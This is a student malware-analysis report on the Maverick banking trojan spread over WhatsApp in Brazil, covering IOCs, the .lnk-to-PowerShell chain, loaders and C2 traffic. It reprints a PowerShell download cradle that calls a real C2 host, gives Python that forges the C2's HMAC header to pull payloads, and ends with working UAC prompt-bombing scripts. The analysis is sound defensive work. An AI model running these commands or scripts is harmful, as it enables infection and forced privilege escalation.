```
AT19N0116 Phan Huy Hoang
AT19N0119 Le Ba Quoc Khanh
AT19N0123 Truong Hoang Lan
AT19N0140 Thai Nhut Tien
AT19N0145 Nguyen Ngoc Tu
AT19N0153 Hoang Lam
```

# Maverick

## ref
- https://securelist.com/maverick-banker-distributing-via-whatsapp/117715/
- https://simplificandoredes.com/en/maverick-malwarewhatsapp/
- https://www.trendmicro.com/ru_ru/research/25/j/self-propagating-malware-spreads-via-whatsapp.html

## IOCs
- Malware samples: [MalwareBazaar](https://bazaar.abuse.ch/browse/tag/Maverick/)
> zip password: ``infected``
> verify the checksums before analysing
- The `.lnk` sample: [zip](https://upfile.live/vi/files/c9e62c4f)
> zip password: ``infected``

| SHA256 | Tags |
|:--|:--|
| `25de3ba7ee0a0f4db696b92359f1e14f5a01e1e680ad85905246c657a382fd62` | `banker` `exe` `Maverick` |
| `8350a241a40045b04bacdd0f2d013a702adfc3dc530d303af4d3f6c94e614b4f` | `ArmDot` `coyote` `Dotnet` `exe` `expansiveuser-com` `Maverick` |
| `3dfb21deb61a9b772f28699ae8ad376b6ed26c11de47fe6e0cd59fc252995a53` | `coyote` `Dotnet` `exe` `expansiveuser-com` `Maverick` |
| `06ddb29639e875fed71185e02fd477964e2aab0082f923ac36533a86a4c56e53` | `coyote` `Dotnet` `exe` `expansiveuser-com` `Maverick` |
| `543e044c972183d7edbb566f729687822b19d0b78bee39965799ccb9532553fa` | `banker` `casadecampoamazonas-com` `exe` `Maverick` `sorvetenopote-com` `tropicalexecutivehotel-com` |
| `a6b33f3d366f38c0529a7e956cae2c784356095c039af985c29ded1f639b75a2` | `banker` `casadecampoamazonas-com` `exe` `Maverick` `sorvetenopote-com` `tropicalexecutivehotel-com` |
| `5f2b3891b3f6fd1271bbafa7af4213283c1573b107d7ad167273a01d1b5966e0` | `arenahamburguer-com` `casadecampoamazonas-com` `exe` `expansivebot-com` `Maverick` |

## Introduction
This report analyzes a set of samples labeled "Maverick" (see IOCs) to document observed behavior, extract actionable indicators, and provide detection and mitigation guidance for defenders. Based on internal notes and preliminary telemetry, the campaign appears to target **Brazil**.

**Primary target sector (likely):**
- Individual users and small-to-medium businesses (SMBs) exposed to messaging- or download-based social engineering.

**Primary target geography:**
- **Brazil** (inferred). *Note:* this inference is based on internal reporting; the report documents the evidence used to support the Brazil attribution.

**Primary target OS:**
- **Microsoft Windows**, inferred from delivery via `.lnk` shortcuts and PE-format executables.

**Scope of the report:** static analysis of the provided samples, extraction of IOCs (hashes, domains, IPs, mutexes), mapping of observed techniques to MITRE ATT&CK, and production of starter detection artifacts (YARA, Sigma, Splunk).

## Compare to Coyote
https://securelist.com/coyote-multi-stage-banking-trojan/111846/

| Category | Coyote | Maverick |
| ---------------- | ------------------- | --------------------------- |
| **Target** | Global | Mainly Brazil |
| **Vector** | Email phishing | WhatsApp Web propagation |
| **Obfuscation** | Donut packer | ArmDot (.NET) |
| **Architecture** | Simple, monolithic | Modular (Stage1-2-Agent) |
| **Persistence** | Registry / Task | Multi-layer persistence |
| **C2** | Static HTTP domains | Encrypted, rotating domains |
| **Evasion** | Basic | Anti-VM, Anti-debug |
| **Goal** | Credential theft | Credential theft + spread |

## Initial infection vector
![image](https://hackmd.io/_uploads/rkrGLMjyWl.png)
> infection chain

![image](https://hackmd.io/_uploads/BJEKSwhkbg.png)
> instruction from the attacker
> ``"Display is allowed only on computers. If you are using the Chrome browser, you may be prompted to 'Keep' the file, because it is a zipped file."``

- WhatsApp is a popular, well-known, cross-platform application, so why would the attacker/scammer need the victim's computer?
- That alone is a suspicious sign we should be concerned about

![image](https://hackmd.io/_uploads/S1oeCvhJ-e.png)

## Stage 1
- Even before the ``.zip`` is extracted, Windows Defender detects it as a Worm

![upload_c6f34587cc9435cdb26a1376f08504ee](https://hackmd.io/_uploads/HJmmC6C1Wl.png)

- So to analyse this file it is better to temporarily turn off Windows Defender and do the work inside a virtual machine

![image](https://hackmd.io/_uploads/BJAZQQs1We.png)
> shortcut to cmd.exe

:::spoiler base64
```
TAAAAAEUAgAAAAAAwAAAAAAAAEY1AAAAAAAAAICHHD7sMtwBgIccPuwy3AGAhxw+7DLcAQAAAAAA
AAAABwAAAAAAAAAAAAAAAAAAABUBFAAfUOBP0CDqOmkQotgIACswMJ0ZAC9DOlwAAAAAAAAAAAAA
AAAAAAAAAAAALgAxAAAAAABBW2NnEABDOgAAHAADAAQA775BW2NnQVtjZxQAAABDADoAAAASADwA
MQAAAAAAQVtjZxAAV2luZG93cwAmAAMABADvvkFbY2dBW2NnFAAAAFcAaQBuAGQAbwB3AHMAAAAW
AEAAMQAAAAAAQVtjZxAAU3lzdGVtMzIAACgAAwAEAO++QVtjZ0FbY2cUAAAAUwB5AHMAdABlAG0A
MwAyAAAAGAA8ADIAAAAAAEFbY2cQAGNtZC5leGUAJgADAAQA775BW2NnQVtjZxQAAABjAG0AZAAu
AGUAeABlAAAAFgAAABUAU3lzdGVtVXBkYXRlXzVmMzNjOGE2FABDOlxXaW5kb3dzXFN5c3RlbTMy
XIsCL1dNUlg6RjBFIC9XRlhJOkJOWUU1UyAvRC9DICJmb3IgJW8gaW4gKC0pIGRvIGZvciAlYSBp
biAocCkgZG8gZm9yICVPIGluIChlbGwuKSBkbyBmb3IgJVQgaW4gKCJCWUFHTUFhQUJzQUVNQVpB
QkRBRlFBYlFBM0FHNEFjZ0JVQUVjQWJnQnFBRGNBYUFCTUFGRUFVZ0JUQUhBQU13QnBBSGNBSndB
cEFBPT0iKSBkbyBmb3IgJWwgaW4gKCJrQUxnQkVBRzhBZHdCdUFHd0Fid0JoQUdRQVV3QjBBSElB
YVFCdUFHY0FLQUFuQUdnQWRBQjBBSEFBY3dBNkFDOEFMd0JsQUhnQWNBQmgiKSBkbyBmb3IgJUog
aW4gKGV4ZSkgZG8gZm9yICVtIGluIChoaWQpIGRvIGZvciAlcCBpbiAoIlNRQkZBRmdBSUFBb0FF
NEFaUUIzQUMwQVR3QmlBR29BWlFCakFIUUFJQUJPQUdVQWRBQXVBRmNBWlFCaUFFTUFiQUJwQUdV
QWJnQjBBQyIpIGRvIGZvciAlQiBpbiAoLWUpIGRvIGZvciAlTCBpbiAoZXJzaCkgZG8gZm9yICVV
IGluICh3KSBkbyBmb3IgJUQgaW4gKHcpIGRvIGZvciAleCBpbiAobykgZG8gZm9yICV3IGluICgi
QUc0QWN3QnBBSFlBWlFCMUFITUFaUUJ5QUM0QVl3QnZBRzBBTHdCaEFIQUFhUUF2QUdrQWRBQmlB
R2tBTHdCSUFIRUFVQUJIQURVQVp3IikgZG8gZm9yICVRIGluIChuYykgZG8gJWEleCVVJUwlTyVK
ICVvJUQgJW0gJUIlUSAlfnAlfmwlfnclflQiAAAAAA==
```
:::
> or you can use my base64 for integrity

![image](https://hackmd.io/_uploads/Hk1eTT01be.png)

- It is a shortcut to cmd.exe with the argument list ``/D/C`` followed by a long command string
:::spoiler explain
``/D`` Disable execution of AutoRun commands from the registry
``/C`` Carry out the command specified by the string and then terminate

![image](https://hackmd.io/_uploads/H1Y9-d31bx.png)
:::
- What it finally runs: ``do %a%x%U%L%O%J %o%D %m %B%Q %~p%~l%~w%~T``
- The real arguments are assembled from a chain of obfuscated ``for`` variables, each ``for %v in (value) do`` binding one fragment (note that the variable names are case-sensitive: ``%o`` and ``%O`` are different)
- First part
  - ``for %o in (-) do`` --> ``%o`` = ``-``
  - ``for %a in (p) do`` --> ``%a`` = ``p``
  - ``for %O in (ell.) do`` --> ``%O`` = ``ell.``
  - ``for %J in (exe) do`` --> ``%J`` = ``exe``
  - ``for %m in (hid) do`` --> ``%m`` = ``hid``
  - ``for %B in (-e) do`` --> ``%B`` = ``-e``
  - ``for %L in (ersh) do`` --> ``%L`` = ``ersh``
  - ``for %U in (w) do`` --> ``%U`` = ``w``
  - ``for %D in (w) do`` --> ``%D`` = ``w``
  - ``for %x in (o) do`` --> ``%x`` = ``o``
  - ``for %Q in (nc) do`` --> ``%Q`` = ``nc``
  - ``%a%x%U%L%O%J %o%D %m %B%Q`` --> ``powershell.exe -w hid -enc``
> ``-w hid``: ``-WindowStyle Hidden``
> ``-enc``: ``-EncodedCommand``
- Second part: the four quoted fragments
```
do for %T in ("BYAGMAaABsAEMAZABDAFQAbQA3AG4AcgBUAEcAbgBqADcAaABMAFEAUgBTAHAAMwBpAHcAJwApAA==")
do for %l in ("kALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHgAcABh")
do for %p in ("SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AC")
do for %w in ("AG4AcwBpAHYAZQB1AHMAZQByAC4AYwBvAG0ALwBhAHAAaQAvAGkAdABiAGkALwBIAHEAUABHADUAZw")
```
``do %a%x%U%L%O%J %o%D %m %B%Q %~p%~l%~w%~T``
- Concatenated string ``%~p%~l%~w%~T`` (the ``~`` modifier strips the surrounding quotes, so the four pieces join into one base64 string):
``SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHgAcABhAG4AcwBpAHYAZQB1AHMAZQByAC4AYwBvAG0ALwBhAHAAaQAvAGkAdABiAGkALwBIAHEAUABHADUAZwBYAGMAaABsAEMAZABDAFQAbQA3AG4AcgBUAEcAbgBqADcAaABMAFEAUgBTAHAAMwBpAHcAJwApAA==``

![image](https://hackmd.io/_uploads/r1-t2QikZe.png)
> ``-EncodedCommand`` (``-enc`` in part 1) expects the base64 of a UTF-16LE string, so it must be decoded as UTF-16LE, not UTF-8
```
IEX (New-Object Net.WebClient).DownloadString('https://expansiveuser.com/api/itbi/HqPG5gXchlCdCTm7nrTGnj7hLQRSp3iw')
```
- Final deobfuscated command:
``powershell.exe -w hid -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHgAcABhAG4AcwBpAHYAZQB1AHMAZQByAC4AYwBvAG0ALwBhAHAAaQAvAGkAdABiAGkALwBIAHEAUABHADUAZwBYAGMAaABsAEMAZABDAFQAbQA3AG4AcgBUAEcAbgBqADcAaABMAFEAUgBTAHAAMwBpAHcAJwApAA==``
> which is
> ``powershell.exe -w hid IEX (New-Object Net.WebClient).DownloadString('https://expansiveuser.com/api/itbi/HqPG5gXchlCdCTm7nrTGnj7hLQRSp3iw')``
- Attackers prefer a ``.lnk`` as the execution method because some AV/EDR products inspect shortcuts less carefully than ``.exe`` files
> bypasses basic defences
- We can now be fairly sure the malware was built for Windows only
> ``.lnk``, ``cmd.exe``, ``powershell``
> plus the .NET framework loader covered in the following sections

![image](https://hackmd.io/_uploads/Ski8yu21bl.png)

## Stage 2
- Once the PowerShell command above runs, it contacts the C2 and downloads another PowerShell script
- The download link is already down (taken down for malicious activity), so this stage is analysed from the public write-ups

![image](https://hackmd.io/_uploads/Sk1qUVsJbe.png)

- This is the C2 server's first layer of defence: it checks the **User-Agent** header. The request must come from the customised PowerShell script (the User-Agent is presumably hard-coded in the *Stage 2* script); otherwise the server returns 401 Unauthorized
> an anti-analysis / anti-sandbox measure that simply rejects unverified clients such as `wget` or `curl` trying to download the next payload, forcing the full `.lnk` chain to be executed to obtain the whole payload
- The script decodes an embedded .NET file entirely in memory, without writing anything to disk
> by simply dividing each byte by a fixed value (here 174)
> --> which makes the infection fileless
- It then uses ``[System.Reflection.Assembly]::Load()`` to load the assembly reflectively
:::spoiler example
```ps1
$bytes = ...                       # decoded assembly bytes (byte[])
# Load the assembly into memory without touching disk
$assembly = [System.Reflection.Assembly]::Load($bytes)
# Optionally invoke a method from the loaded assembly
$type = $assembly.GetType("Namespace.ClassName")
$method = $type.GetMethod("MethodName")
$method.Invoke($null, @("arg1", "arg2"))
```
:::
> the script presumably also bypasses [AMSI](https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal) before loading

## Stage 3
>  Fileless Execution and Loader Deployment

### .NET loader
- Entrypoint:

![image](https://hackmd.io/_uploads/HyhcISikZg.png)
> Obfuscation method: Control Flow Flattening
:::spoiler example Control Flow Flattening
https://github.com/obfuscator-llvm/obfuscator/wiki/Control-Flow-Flattening
- From this
```c
#include <stdlib.h>

int main(int argc, char** argv) {
    int a = atoi(argv[1]);
    if (a == 0)
        return 1;
    else
        return 10;
    return 0;
}
```
- To this: every basic block becomes a `case` of one `switch` driven by a state variable, so the original branch structure is no longer visible
```c
#include <stdlib.h>

int main(int argc, char** argv) {
    int a = atoi(argv[1]);
    int b = 0;               /* state variable selecting the next block */
    while (1) {
        switch (b) {
            case 0:
                if (a == 0) b = 1; else b = 2;
                break;
            case 1:
                return 1;
            case 2:
                return 10;
            default:
                break;
        }
    }
    return 0;
}
```
:::
- Uses indirect function calls via pointer mangling
> ex:

![image](https://hackmd.io/_uploads/BJ4-kvjk-e.png)
> stores the function-pointer addresses (IntPtr) inside a vector/array and looks them up by index
> combined with the flattening above, this makes reversing considerably harder
- Performs random sleeps and checks TimeZone, DateTime, etc. as anti-analysis measures
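The Stage 1 chain above can be reproduced without running cmd.exe. The following Python script is an added example written for this report (it is not the malware's code and not taken from the referenced write-ups): it rebuilds the shortcut's argument string from the four base64 fragments quoted in Stage 1, resolves the `for %v in (...) do` variable chain the way cmd.exe does (`%~v` strips the surrounding quotes, plain `%v` keeps them), reassembles the `powershell.exe` command line and decodes its `-EncodedCommand` argument as UTF-16LE to recover the download-cradle URL. The two junk-looking switches `/WMRX:F0E /WFXI:BNYE5S` that precede `/D/C` in the decoded shortcut are kept verbatim; the regular expressions are mine and assume single-character, case-sensitive for-variable names, which is how cmd.exe treats them.

```python
"""Stage 1 deobfuscator: resolve the cmd.exe `for %v in (...) do` chain from the Maverick .lnk,
rebuild the powershell.exe command line and decode its -EncodedCommand argument."""
import base64
import re

# The four base64 fragments exactly as they appear in the shortcut's argument string.
B64_T = "BYAGMAaABsAEMAZABDAFQAbQA3AG4AcgBUAEcAbgBqADcAaABMAFEAUgBTAHAAMwBpAHcAJwApAA=="
B64_L = "kALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBlAHgAcABh"
B64_P = "SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0AC"
B64_W = "AG4AcwBpAHYAZQB1AHMAZQByAC4AYwBvAG0ALwBhAHAAaQAvAGkAdABiAGkALwBIAHEAUABHADUAZw"

# cmd.exe argument string of the .lnk, reconstructed from the decoded shortcut
# (the /WMRX and /WFXI switches are junk that precedes /D/C in the sample).
LNK_ARGS = (
    '/WMRX:F0E /WFXI:BNYE5S /D/C "'
    "for %o in (-) do for %a in (p) do for %O in (ell.) do "
    f'for %T in ("{B64_T}") do for %l in ("{B64_L}") do '
    "for %J in (exe) do for %m in (hid) do "
    f'for %p in ("{B64_P}") do for %B in (-e) do for %L in (ersh) do '
    "for %U in (w) do for %D in (w) do for %x in (o) do "
    f'for %w in ("{B64_W}") do for %Q in (nc) do '
    '%a%x%U%L%O%J %o%D %m %B%Q %~p%~l%~w%~T"'
)

# One `for %v in (value) do` prefix; group 2 records whether the value was quoted.
FOR_RE = re.compile(r'for %(\w) in \(("?)(.*?)\2\) do ')


def cmd_body(args: str) -> str:
    """Return the string that cmd.exe /C executes (outer quotes removed)."""
    m = re.search(r'/C\s+"(.*)"\s*$', args, re.S)
    if not m:
        raise ValueError('no /C "..." block in the argument string')
    return m.group(1)


def resolve_for_chain(body: str):
    """Walk the chain of for-variable bindings; return (bindings, remaining command)."""
    bindings = {}
    pos = 0
    while (m := FOR_RE.match(body, pos)):
        name, quote, value = m.group(1), m.group(2), m.group(3)
        bindings[name] = (value, bool(quote))  # names are case-sensitive (%o vs %O)
        pos = m.end()
    return bindings, body[pos:]


def expand(template: str, bindings: dict) -> str:
    """Substitute %v and %~v; the ~ modifier strips surrounding quotes, as cmd.exe does."""
    def sub(m):
        tilde, name = m.group(1), m.group(2)
        value, quoted = bindings[name]
        return value if tilde or not quoted else f'"{value}"'
    return re.sub(r"%(~?)(\w)", sub, template)


def decode_encoded_command(cmdline: str) -> str:
    """Find the -EncodedCommand argument (any prefix: -e, -enc, ...) and decode it as UTF-16LE."""
    toks = cmdline.split()
    for i, tok in enumerate(toks[:-1]):
        flag = tok.lower().lstrip("-")
        if tok.startswith("-") and flag and "encodedcommand".startswith(flag):
            return base64.b64decode(toks[i + 1]).decode("utf-16-le")
    raise ValueError("no -EncodedCommand argument found")


URL_RE = re.compile(r"""https?://[^\s'"()]+""")


def deobfuscate_lnk_args(args: str) -> dict:
    """Full pipeline: .lnk arguments -> powershell command line -> decoded script -> URLs."""
    bindings, tail = resolve_for_chain(cmd_body(args))
    cmdline = expand(tail, bindings)
    script = decode_encoded_command(cmdline)
    return {"cmdline": cmdline, "script": script, "urls": URL_RE.findall(script)}


if __name__ == "__main__":
    result = deobfuscate_lnk_args(LNK_ARGS)
    print(result["cmdline"][:60] + "...")
    print(result["script"])
    print(result["urls"])
```

Run it as a script to print the reconstructed command line, the decoded script and the extracted URL. `deobfuscate_lnk_args()` takes any cmd.exe argument string of the same shape, so after pulling the arguments out of another `.lnk` with a shortcut parser it can be reused on related samples.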
> ![image](https://hackmd.io/_uploads/S1SByDiyZe.png)
- Communicates with the C2 through an API exposed on the route ``/api/v1``

![image](https://hackmd.io/_uploads/B1FjaVTkZg.png)
> ``https://sorvetenopote[.]com/api/v1/3d045ada0df942c983635e``
> ``https://zapgrande[.]com/api/v1/19230d53a96d4facbead047f645e02b8``
> ... various C2 servers
- Applies HMAC authentication through a custom request header, ``"X-Request-Headers"``, whose value is the API key
> or ``"X-Request-Hash"`` in another payload
- The API key is computed locally with the scheme ``Base64(HMAC-SHA256(Key, Data))``
- HMAC secret key: ``MaverickZapBot2025SecretKey12345`` (hard-coded)
- Signed data: ``3d045ada0df942c983635e|1759847631|MaverickBot`` (client id | timestamp | bot name)
> yes, another anti-analysis measure, like the User-Agent check above: without the secret and a valid timestamp, a plain client never receives the payload

![image](https://hackmd.io/_uploads/ryOPkrpkWe.png)
![image](https://hackmd.io/_uploads/HkY2yr6JZl.png)
- After authentication, the C2 returns two encrypted shellcode payloads
  - WhatsApp Infector: the "spread mechanism"
  - Final payload (also called "MaverickBanker"): the "data theft mechanism"

![image](https://hackmd.io/_uploads/HkQf6V6yZx.png)
:::spoiler Analyse Shellcode
- The encrypted shellcode is a loader built with Donut
> an open-source project that generates x86, x64, or AMD64+x86 position-independent shellcode that loads .NET assemblies, PE files, and other Windows payloads from memory
> https://github.com/TheWover/donut
- It is wrapped in a custom XOR layout
> The last 4 bytes (Int32, little-endian in the example below) give the key size
> The key is the run of ``keysize`` bytes immediately before that 4-byte field (it ends at offset filesize-4)
> The raw payload is the remainder (filesize - 4 - keysize bytes)
ex:
```
0x01 0x02 0x03 0x04 ... 0xFF 0xEF 0xBE 0xAD 0xDE 0x04 0x00 0x00 0x00
0x01 0x02 0x03 0x04 ... 0xFF|0xEF 0xBE 0xAD 0xDE|0x04 0x00 0x00 0x00
{--------raw payload-------}|{-----Key_XOR-----}|{-----KeySize-----}
```
:::
- Splitting the attack chain into two branches is a deliberate design: the attacker can update or replace one component without refactoring or affecting the other, which increases the campaign's resilience and adaptability

## WhatsApp Infector Module
> I can't find Maverick.StageOne 🤷‍♂️

![image](https://hackmd.io/_uploads/rJaIR7a1-g.png)
- This payload is entirely about self-propagation of the malware
- It first loads another downloader, with the same obfuscation as above
- That downloader fetches yet another .NET assembly and loads it as an extension module
> difference: this one is not an encrypted Donut shellcode

![image](https://hackmd.io/_uploads/rkFLkta1Wg.png)
- The module has a namespace ``ZAP`` and embeds a script from [WPPConnect](https://github.com/wppconnect-team/wppconnect), an open-source library for interacting with and controlling WhatsApp Web, together with [Selenium](https://www.selenium.dev/downloads/) for browser automation
- It locates the WhatsApp window in the browser, hijacks the session using WPPConnect and automatically sends the malicious message to the victim's contacts, closing the infection loop

## MaverickBanker
### Maverick - Trojan
- namespace ``Maverick.StageTwo``

![image](https://hackmd.io/_uploads/ryMxuc6kbx.png)
- The entrypoint calls ``RegisterStartup()``

![image](https://hackmd.io/_uploads/rkvNWwsk-e.png)
- It registers persistence (if not already present) by checking for a pre-existing obfuscated ``.bat`` file
:::spoiler
- Inspects the "StartUp" folder for a batch file
> ``Environment.SpecialFolder.Startup``
- Performs a pattern match
> looks for the signature strings ``"for %%"`` and ``" in ("`` (the same ``for``-variable trick as the ``.lnk``)
- If nothing matches, generates the file name ``"HealthApp-{6-char_GUID}.bat"``
- The content is generated by ``Program.GenerateObfuscaedBatCommand(string url)``
> where the url is the combination of:
>
![image](https://hackmd.io/_uploads/rkjUbvok-l.png)
> "hxxps://sorvetenopote.com" + "/api/itbi/startup/" + Guid.NewGuid().ToString("N")

![image](https://hackmd.io/_uploads/rkFg4Pik-l.png)
> the same kind of batch file as the one launched from the ``.lnk``
:::
- After that it starts the worker task ``MonitorBrowserUrl()``

![image](https://hackmd.io/_uploads/BJTFEPsk-x.png)
> a ``for(;;)`` loop that monitors the foreground (focused) window, looking for a banking session worth reporting to the C2
:::spoiler ``Program.GetActiveBrowserUrl()``
- Gets the URL of the current tab of the active browser window

![image](https://hackmd.io/_uploads/Skw04DjJWx.png)
> checks for "chrome", "firefox", "msedge", "brave", "iexplore"
> also has a hard-coded check for `"navegador exclusivo bradesco"` (Bradesco's exclusive browser) and returns `"banco.bradesco"` if it is detected
:::
:::spoiler ``Program.DecryptDomain(string base64)``
- Base64-decodes and AES-256-CBC-decrypts the ``string @base``, which holds the list of targeted online-banking sites, and returns it as a Dictionary

![image](https://hackmd.io/_uploads/S10GN0CyWl.png)
> IV is the first 16 bytes
> Key is the next 32 bytes

![image](https://hackmd.io/_uploads/HJ-7qRR1Zg.png)
- The result is stored in a global variable, and a null check avoids decrypting it again

![image](https://hackmd.io/_uploads/Hy2c9ARJbx.png)
![image](https://hackmd.io/_uploads/HyVh9RCkZl.png)
:::
:::spoiler ``Program.CheckDomainTarget()``
- Matches the URL's domain against a set of rules and returns a structured result

![image](https://hackmd.io/_uploads/BJNMwpp1bg.png)
> Return type: ``ValueTuple<bool, int, string>``
> Early return when the parameter is null or an empty string
> Uses regular expressions to match certain URL domains
> Uses a ``HashSet`` for fast lookups
:::
- If a match is found, it decrypts another PE file embedded as a hard-coded byte array. The decrypted payload is then loaded directly into memory with ``Assembly.Load()``
- Once loaded, it locates the assembly's entrypoint and creates a delegate to invoke it

![image](https://hackmd.io/_uploads/SJaaiA01Zx.png)

### Maverick - Agent
- Judging by the class names, this PE acts as a client

![image](https://hackmd.io/_uploads/Ske-3001Zx.png)
- The entrypoint targets Brazil only:

![image](https://hackmd.io/_uploads/HyAAUDiy-x.png)
:::spoiler ``AntiAnalysisBrazil.IsSuspiciousEnvironment()``
![image](https://hackmd.io/_uploads/Hy4SIwjyWg.png)
- Checks four criteria: timezone, locale, region and date format

![image](https://hackmd.io/_uploads/By0rIviy-x.png)
:::
- Next, before opening the C2 channel, it enables DPI awareness so that screen capture and coordinates scale correctly
> `DpiUtils.EnableDpiAwareness()`
- Then it checks the persistence files in `\Start Menu\Programs\`
> `Program.OnlyOneFileInStartup()`
> if more than one file is found, it keeps the newest (by `GetCreationTime`) and deletes the rest
- It then instantiates a WatsonTcp client that connects to the malicious server over port 443 (the HTTPS port)
> ``adoblesecuryt[.]com``
> ``casadecampoamazonas[.]com``
> ...
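To fetch the Stage 3 payloads in a lab, the C2's HMAC header has to be reproduced and the returned blob unwrapped. Both pieces from the Stage 3 section above, the `Base64(HMAC-SHA256)` request hash over `id|timestamp|MaverickBot` with the hard-coded key, and the `[payload][key][int32 key size]` XOR layout around the Donut shellcode, are implemented in this added Python example, which is not the malware's code. Assumptions are labelled in the comments: the timestamp is Unix seconds, the server enforces a freshness window, and the XOR key is applied cyclically over the payload; the report does not state the last two.

```python
"""Two Stage 3 mechanisms from the report, reproduced for lab use: the HMAC request header the
loader sends for /api/v1/<id>, and the XOR wrapper around the Donut shellcode it receives."""
import base64
import hashlib
import hmac
import struct

HMAC_KEY = b"MaverickZapBot2025SecretKey12345"  # hard-coded secret quoted in the report
BOT_TAG = "MaverickBot"


def build_request_hash(client_id: str, ts: int) -> str:
    """Base64(HMAC-SHA256(key, "<id>|<timestamp>|MaverickBot")), the X-Request-Hash value.
    Assumption: <timestamp> is Unix seconds (1759847631 in the sample is 2025-10-07)."""
    signed = f"{client_id}|{ts}|{BOT_TAG}".encode()
    return base64.b64encode(hmac.new(HMAC_KEY, signed, hashlib.sha256).digest()).decode()


def verify_request_hash(client_id: str, ts: int, header: str, now: int, skew: int = 300) -> bool:
    """Server-side check as a lab emulator would do it: constant-time compare plus a freshness
    window. The window is an assumption; the report only shows the signed fields."""
    if abs(now - ts) > skew:
        return False
    return hmac.compare_digest(build_request_hash(client_id, ts), header)


def unwrap_xor_blob(blob: bytes) -> tuple:
    """Split [raw payload][key][int32 LE key size] and XOR the payload with the key.
    Assumption: the key is applied cyclically; the report says 'custom XOR' without the stride."""
    if len(blob) < 5:
        raise ValueError("blob too short")
    (key_size,) = struct.unpack("<i", blob[-4:])
    if key_size <= 0 or key_size + 4 > len(blob):
        raise ValueError(f"implausible key size {key_size}")
    key = blob[-4 - key_size:-4]
    raw = blob[:-4 - key_size]
    payload = bytes(b ^ key[i % key_size] for i, b in enumerate(raw))
    return key, payload


def wrap_xor_blob(payload: bytes, key: bytes) -> bytes:
    """Inverse of unwrap_xor_blob, used to build test blobs in the same layout."""
    enc = bytes(b ^ key[i % len(key)] for i, b in enumerate(payload))
    return enc + key + struct.pack("<i", len(key))


# The 13-byte layout example from the report: payload 01 02 03 04 FF, key EF BE AD DE, size 4.
REPORT_EXAMPLE = bytes.fromhex("01020304ff" "efbeadde" "04000000")

if __name__ == "__main__":
    cid, ts = "3d045ada0df942c983635e", 1759847631
    h = build_request_hash(cid, ts)
    print("X-Request-Hash:", h, verify_request_hash(cid, ts, h, now=ts))
    key, payload = unwrap_xor_blob(REPORT_EXAMPLE)
    print("key:", key.hex(), "payload:", payload.hex())
```

Against a live server, `build_request_hash()` supplies the `X-Request-Hash` / `X-Request-Headers` value for a GET on `/api/v1/<id>` (the User-Agent must still match the Stage 2 script), and `unwrap_xor_blob()` turns the response into the Donut blob that can then be handed to a Donut decoder or an emulator.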
### C2 Communication
```csharp
using System;

namespace Maverick.Agent
{
    // Command set understood by the agent (decompiled enum; dnSpy token comments removed)
    public enum CommandTypes
    {
        INFOCLIENT,
        RECONNECT,
        REBOOT,
        KILLAPPLICATION,
        SCREENSHOT,
        KEYLOGGER,
        MOUSECLICK,
        KEYBOARDONECHAR,
        KEYBOARDMULTIPLESCHARS,
        GETMODULE,
        TOOGLEDESKTOP,
        TOOGLEINTERN,
        GENERATEWINDOWLOCKED,
        FREECLIENT,
        LISTALLHANDLESOPENEDS,
        KILLPROCESS,
        CLOSEHANDLE,
        MINIMIZEHANDLE,
        MAXIMIZEHANDLE,
        RESTOREHANDLE,
        GENERATEWINDOWREQUEST,
        CANCELSCREENREQUEST,
        DATATEXTRECEIVED,
        CHANGESCALETO100,
        ADJUST_QUALITY,
        ADJUST_SCALE
    }
}
```
- Each command is sent to the server as a ``CommandTypes`` value plus an optional ``byte[]`` parameter block over the WatsonTcp connection
```csharp
using System;
using System.Runtime.CompilerServices;
using System.Threading.Tasks;
using WatsonTcp;

namespace Maverick.Agent
{
    public static class CommandSender
    {
        // Decompiled compiler-generated async state machine; the original source is simply
        // `public static async Task SendToServer(WatsonTcpClient client, CommandTypes command, byte[] parameters = null)`
        public static Task SendToServer(WatsonTcpClient client, CommandTypes command, byte[] parameters = null)
        {
            CommandSender.<SendToServer>d__0 <SendToServer>d__;
            <SendToServer>d__.<>t__builder = AsyncTaskMethodBuilder.Create();
            <SendToServer>d__.client = client;
            <SendToServer>d__.command = command;
            <SendToServer>d__.parameters = parameters;
            <SendToServer>d__.<>1__state = -1;
            <SendToServer>d__.<>t__builder.Start<CommandSender.<SendToServer>d__0>(ref <SendToServer>d__);
            return <SendToServer>d__.<>t__builder.Task;
        }
    }
}
```

# UAC Prompt Bombing
http://esentire.com/blog/new-botnet-emerges-from-the-shadows-nightshadec2
https://github.com/eSentire/iocs/blob/main/Nightshade/SandboxBypass/Program.cs
- Forces the user to run the payload as administrator
> the prompt cannot be refused: it re-appears until the user accepts, so the attacker takes control through UAC

## code
### ps1
```ps1
# Seed $? with $false so the loop is entered
try { throw "" }
catch {
    # Loop until Start-Process succeeds (user accepts the UAC prompt); a refused prompt leaves $? = $false
    while ( -not $? ) {
        try { Start-Process cmd.exe -Verb RunAs }
        catch { Write-Error "" -ErrorAction SilentlyContinue }  # keep $? false and retry
    }
}
```
- Stealthier: launch through a signed LOLBin instead of cmd.exe directly, https://lolbas-project.github.io/
```ps1
try { throw "" }
catch {
    while ( -not $? ) {
        # wlrmdr.exe is a signed Windows binary whose -u argument runs an arbitrary program
        try { Start-Process wlrmdr.exe -ArgumentList "-s 3600 -f 0 -t _ -m _ -a 11 -u cmd.exe" -Verb RunAs }
        catch { Write-Error "" -ErrorAction SilentlyContinue }
    }
}
```
- Flatten + encode: collapse the script onto one line
```ps1
